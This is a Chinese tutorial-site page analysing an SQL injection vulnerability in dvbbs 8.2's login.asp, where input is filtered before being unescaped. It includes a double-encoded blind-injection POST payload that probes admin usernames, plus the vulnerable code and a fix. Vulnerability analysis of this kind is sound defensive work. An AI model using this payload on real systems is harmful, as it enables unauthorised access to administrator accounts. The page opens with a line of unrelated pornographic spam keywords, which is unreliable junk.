欧美大屁股bbbbxxxx,狼人大香伊蕉国产www亚洲,男ji大巴进入女人的视频小说,男人把ji大巴放进女人免费视频,免费情侣作爱视频

歡迎來(lái)到入門(mén)教程網(wǎng)!

vb

當(dāng)前位置:主頁(yè) > 軟件編程 > vb >

dvbbs 8.2 SQL Injection注射漏洞分析

來(lái)源:本站原創(chuàng)|時(shí)間:2020-01-10|欄目:vb|點(diǎn)擊: 次

password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
就可觸發(fā).

漏洞分析:動(dòng)網(wǎng)在asp領(lǐng)域也算一個(gè)比較元老的程序,這次在8.2新版里有一個(gè)低級(jí)的錯(cuò)誤.漏洞代碼在login.asp 118行左右

......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)
......
取得的username是先經(jīng)過(guò)檢查然后再unescape解碼,導(dǎo)致用urlencode模式就可以饒過(guò)任何檢查,和php的urldecode導(dǎo)致的注射很類似,譬如用%2527就可以提交'過(guò)去了.

修補(bǔ)方案:修補(bǔ)也很簡(jiǎn)單,將上述代碼改成

......
username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = trim(Dvbbs.CheckStr(unescape(username)))
......

上一篇:用VBS來(lái)代替BAT或CMD文件進(jìn)行命令第1/2頁(yè)

欄    目:vb

下一篇:VBS CHR碼值對(duì)應(yīng)列表

本文標(biāo)題:dvbbs 8.2 SQL Injection注射漏洞分析

本文地址:http://mengdiqiu.com.cn/a1/vb/7734.html

網(wǎng)頁(yè)制作CMS教程網(wǎng)絡(luò)編程軟件編程腳本語(yǔ)言數(shù)據(jù)庫(kù)服務(wù)器

如果侵犯了您的權(quán)利,請(qǐng)與我們聯(lián)系,我們將在24小時(shí)內(nèi)進(jìn)行處理、任何非本站因素導(dǎo)致的法律后果,本站均不負(fù)任何責(zé)任。

聯(lián)系QQ:835971066 | 郵箱:835971066#qq.com(#換成@)

Copyright © 2002-2020 腳本教程網(wǎng) 版權(quán)所有